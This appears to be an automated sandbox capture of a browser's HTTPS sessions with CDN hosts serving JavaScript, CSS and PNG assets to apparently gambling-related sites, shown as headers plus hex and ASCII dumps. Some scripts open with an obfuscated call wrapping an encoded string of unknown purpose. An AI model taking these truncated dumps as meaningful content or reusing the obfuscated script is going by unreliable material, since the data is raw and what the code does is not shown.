                                                                                                                                                          2024-06-09 22:41:18 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 3496
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:53 GMT
                                                                                                                                                          ETag: "6645cacd-da8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE9[301],EU-GER-frankfurt-GLOBAL1-CACHE5[299,TCP_MISS,300],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ae793d056a41ea312257b6bcf92a71b1
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823395
                                                                                                                                                          X-CCDN-Expires: 768605
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC3496INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 5a 67 42 59 42 64 41 47 67 47 38 41 69 51 67 61 67 42 45 42 50 53 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 33 55 69 46 4a 49 41 6c 46 58 5a 49 51 41 41 69 54 63 41 54 72 78 36 55 41 33 41 48 6b 77 41 4b 78 41 38 41 64 41 42 4d 51 72 58 6d 68 41 41 46 42 53 67 67 67 46 33 42 70 68 47 55 41 2b 73 35 42 49 41 73 69 67 50 73 41 4e 69 45 6f 4b 41 44 63 6f 58 33 59 51 5a 67 42 43 41 41 59 41 58 7a 46 56 45 49 55 5a 4e 41 42 65 4a 45 78 4b 43 41 41 78 41 45 30 41 63 30 6f 78 55 69 68 30 76 54 52 4d 4e 47 4c 65 64 4d 79 36 41 31 78 67 49 74 49 55 4d 6f 72 65 59 74 39 61 79 67 41 35 58 49 41 50 64 57 61 59 62 72 70 32 41 48 6f 41 4a 6d 61
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZgBYBdAGgG8AiQgagBEBPSgLgDMBXNGAFwEt1M3UiFJIAlFXZIQAAiTcATrx6UA3AHkwAKxA8AdABMQrXmhAAFBSgggF3BphGUA+s5BIAsigPsANiEoKADcoX3YQZgBCAAYAXzFVEIUZNABeJExKCAAxAE0Ac0oxUih0vTRMNGLedMy6A1xgItIUMoreYt9aygA5XIAPdWaYbrp2AHoAJma


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          493192.168.2.55027423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC648OUTGET /pc/image-pc/index/382/top/icon_user.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1102
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:17 GMT
                                                                                                                                                          ETag: "64c0a20d-44e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE7[3],EU-FRA-paris-GLOBAL1-CACHE17[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473792
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3ebd3c6b3239265c90a47059eb6cf8f7
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118208
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC1102INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 11 08 06 00 00 00 ed c8 9d 9f 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          494192.168.2.55027390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC553OUTGET /pc/240516-03/static/js/components/alertBox.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1508
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:46 GMT
                                                                                                                                                          ETag: "6645cac6-5e4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,1],EU-GER-frankfurt-GLOBAL1-CACHE11[308],EU-GER-frankfurt-GLOBAL1-CACHE11[303,TCP_MISS,306],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d11893856acfeb80fa6432d98d751387
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823396
                                                                                                                                                          X-CCDN-Expires: 768604
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC1508INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 5a 6e 77 46 30 41 61 41 62 77 43 49 42 47 41 4a 77 46 55 42 70 43 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 55 45 6b 68 4c 63 41 6c 4a 58 5a 49 51 41 41 69 54 63 61 76 48 68 51 44 63 41 65 54 41 41 72 45 44 77 42 30 41 45 78 43 74 65 61 45 41 41 55 61 4b 43 43 42 72 63 41 6e 70 68 45 55 41 2b 73 35 42 49 41 73 69 6e 33 73 41 4e 69 41 70 79 41 44 63 6f 58 33 59 51 5a 67 42 43 41 41 59 41 58 7a 45 56 45 4a 6f 5a 45 41 42 65 62 6b 77 4b 41 42 46 39 41 41 35 67 43 6a 45 53 4e 48 54 64 4e 45 77 51 49 74 35 30 7a 49 41 35 41 45 30 41 44 7a 56 43 6b 68 67 61 37 50 59 41 65 67 41 6d 56 70 52 55 7a 48 4b 78 54 44 4a 59 6b 67 31 74 48 6b 78
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAZnwF0AaAbwCIBGAJwFUBpCgLgDMBXNGAFwEt1MUEkhLcAlJXZIQAAiTcavHhQDcAeTAArEDwB0AExCteaEAAUaKCCBrcAnphEUA+s5BIAsin3sANiApyADcoX3YQZgBCAAYAXzEVEJoZEABebkwKABF9AA5gCjESNHTdNEwQIt50zIA5AE0ADzVCkhga7PYAegAmVpRUzHKxTDJYkg1tHkx


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          495192.168.2.55027523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC647OUTGET /pc/image-pc/index/382/top/icon_psw.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1142
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:17 GMT
                                                                                                                                                          ETag: "64c0a20d-476"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[5],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE26[2],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473792
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b57957b006f58876fb7af46d440d0b9c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118208
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC1142INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 11 08 06 00 00 00 ed c8 9d 9f 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          496192.168.2.550270183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC564OUTGET /061410/rcenter/common/themes/error.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC649INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-30
                                                                                                                                                          ETag: W/"655579ca-1213"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:18 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-24-30
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-20
                                                                                                                                                          X-Cdn-Request-ID: d102ef446259933e58052d1249542032
                                                                                                                                                          2024-06-09 22:41:18 UTC1182INData Raw: 32 64 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 58 db 6e ac 36 14 fd 15 9a 3e 24 91 86 09 97 5c 4e e1 e5 f4 ad 95 da be 1c f5 03 cc 60 c0 8d c1 c8 38 93 c9 41 f3 ef b5 f1 85 6d 20 47 53 35 51 34 0a ac bd 58 fb e6 1b 34 f1 ae 49 76 4d ba db 37 b1 fc 25 f2 97 8e 15 eb 44 58 a1 96 d0 b7 ec ea 1b ae 19 0e fe fe fd 6a 77 f5 1b a6 47 2c c8 01 05 7f e1 17 0c 01 75 1f fe 41 ea 46 5c ed 1c b8 fb 95 13 44 77 03 ea 86 70 c0 9c 54 f9 24 fc 8a 15 2f 7b 8a a2 f3 5e e0 93 04 1a 22 f0 78 60 94 f1 ec e7 aa aa 0c 5c 50 74 78 b6 70 e4 d8 43 83 4a f6 3a 82 eb 2c 0a ee fb 53 10 05 bc 2e d0 4d b4 9b fe f6 f1 ed 79 3f f9 eb 18 6f 11 1d a1 6f 0d 19 bb 68 48 e7 59 53 e5 6b 02 0a 46 cb 71 3b e8 fb 93 36 0c e4 3b ce ee 71 6b e0 14 c2 a9 83 13 08 27 0e 3e 51 08 cb 24 0c 4e 6b 80 c7
                                                                                                                                                          Data Ascii: 2d2Xn6>$\N`8Am GS5Q4X4IvM7%DXjwG,uAF\DwpT$/{^"x`\PtxpCJ:,S.My?oohHYSkFq;6;qk'>Q$Nk


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          497192.168.2.550269183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC619OUTGET /061410/rcenter/common/images/errors/ico-605.png HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 43162
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          ETag: "633d510e-a89a"
                                                                                                                                                          Date: Thu, 06 Jun 2024 11:51:56 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 11:51:56 GMT
                                                                                                                                                          Age: 298162
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-22
                                                                                                                                                          X-Cdn-Request-ID: 325fc4f6a1cda5a071084a995a9eba75
                                                                                                                                                          2024-06-09 22:41:18 UTC15743INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 a8 61 49 44 41 54 78 5e ed bd 07 98 25 55 99 37 fe 9e ba b7 bb a7 27 06 26 91 86 61 08 43 ce 41 32 06 14 54 04 25 88 19 e3 9a 5d 03 86 35 ac ae bb 7e fe 75 f7 f3 5b d7 5d 5d 75 45 d7 04 06 4c 28 08 48 50 94 a0 e4 21 0d 93 99 1c 7b a6 f3 bd b7 aa fe ef ef b9 e7 f7 3c e7 39 a7 ab ea 86 66 18 e0 1e 9e 97 53 75 aa 6e 4d 77 d7 fd bd 31 1c 93 a6 a9 3c 9d c3 18 23 9d d1 a1 0e 3d 3d 54 96 ce 78 d6 d0 1f ff f8 c7 a9 c6 98 33 f1 5e 4b a5 d2 e9 96 b9 76 eb f1 11 38 06 b3 c7 dc d5 d5 b5 28 8b 11 d7 6a b5 15 7a 5c e1 7a 92 24 8b f5 73 15 5e d7 e3 3b 75 1a 89 a2 08 9f f9 fd 71 c7 1d 57 95 ce 78 c6 52 47 03 78 86 d1 cd 37 df 7c b2 82 ef 04 05 f5 31 4a 07 94 cb e5 3d
                                                                                                                                                          Data Ascii: PNGIHDR\rfaIDATx^%U7'&aCA2T%]5~u[]]uEL(HP!{<9fSunMw1<#==Tx3^Kv8(jz\z$s^;uqWxRGx7|1J=
                                                                                                                                                          2024-06-09 22:41:18 UTC16384INData Raw: b8 e5 c7 32 fc a7 df 48 a5 bf 6a 2d fc 58 19 41 02 55 1f 91 13 74 ab f2 cc 00 6a 1f 46 ec 14 84 07 d3 2c 47 80 bb 4e 3f 00 33 21 75 56 34 d5 9d 81 91 ce 89 91 be 75 6b 5c bc 15 32 01 0e cf 11 08 26 70 ac 0d 07 0e 28 c5 4d 33 00 8d fd f7 aa fa df e5 01 da ff d2 e3 38 f7 4b 05 07 a0 30 13 2f 26 b2 ac 2a ee 4a 7d 13 b6 f9 4a b3 9a 7c 92 19 67 74 ee 09 b4 85 b8 26 5b ee fb 1b 1d 7d 79 76 7e 78 8d e7 91 9d 89 30 05 ab a3 0d b5 16 6a b3 3e 00 4a 33 24 02 65 47 00 8a 4d 00 21 23 89 ea 26 40 8c 5a 80 c6 42 76 61 3b 30 62 cd 15 89 25 fe ce 46 da 19 ac de 8b 32 9c 80 bc c9 67 f3 cc 22 15 80 1f 52 bf a7 2c a5 c9 65 75 56 4d 91 ee b3 2f 91 d2 59 6f 12 33 79 46 be 64 db f7 70 e9 be e4 93 b2 75 ea 3e 32 e1 ba ff 86 4f 00 24 a9 92 54 f8 fd a3 ce e0 e1 d9 52 e6 08 4d 80
                                                                                                                                                          Data Ascii: 2Hj-XAUtjF,GN?3!uV4uk\2&p(M38K0/&*J}J|gt&[}yv~x0j>J3$eGM!#&@ZBva;0b%F2g"R,euVM/Yo3yFdpu>2O$TRM
                                                                                                                                                          2024-06-09 22:41:18 UTC11035INData Raw: 00 d8 dd 7a 7e 00 9f 09 3e a0 e1 7a 6a af 2d e9 05 f0 63 d9 39 aa b6 f6 21 47 cb b9 9f fb 37 68 8e 3e 70 1b 12 3a 39 83 0d 3c 10 ee c5 33 e1 f4 c3 e6 1e 8c ff 53 fa d3 e1 0b cd 0e 6b 64 0a 68 b4 73 af e2 65 0d 30 e6 4a ff a7 8f 01 84 5a c0 0e 9b 90 30 47 cb 13 6f 3d f4 d0 43 0f 54 ce d5 eb 39 a6 02 42 0b b1 1f ff f8 c7 f2 da d7 be 96 91 01 de 3b ee 4c e0 d0 97 bc 54 66 ff ee 56 f9 f1 5b 5f 2f 7d 8f 2f 96 44 10 fb 37 60 04 7a 0c 29 65 60 a7 4b 17 70 6a bf b4 d0 0a 22 96 16 db 3d 09 12 c7 39 88 67 47 44 51 18 3d f0 46 d8 b4 84 45 4a 65 a9 3b 25 93 34 a9 7f 81 ab a9 24 60 50 51 22 69 49 d7 8d 92 82 bf 06 e4 44 b0 9b 11 1b de 29 40 d2 34 b3 4e 8c 6d 94 37 cb 90 09 66 a5 f0 82 1c 98 1b e6 c7 07 bd b3 ea 13 8f 01 b2 84 d5 71 75 f1 8a c0 06 c0 6e e2 a4 de a4 55
                                                                                                                                                          Data Ascii: z~>zj-c9!G7h>p:9<3Skdhse0JZ0Go=CT9B;LTfV[_/}/D7`z)e`Kpj"=9gGDQ=FEJe;%4$`PQ"iID)@4Nm7fqunU


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          498192.168.2.550271183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC559OUTGET /061410/rcenter/common/js/gamebox/common/main.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC711INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 1404
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-16-18
                                                                                                                                                          ETag: W/"655579c8-1edb"
                                                                                                                                                          Date: Thu, 06 Jun 2024 16:05:37 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:12 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 16:05:37 GMT
                                                                                                                                                          Age: 282941
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;yancmp16:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-YANC-MP-16-18
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-30
                                                                                                                                                          X-Cdn-Request-ID: 5d0a670ae0f3c51e9b2be29699180496
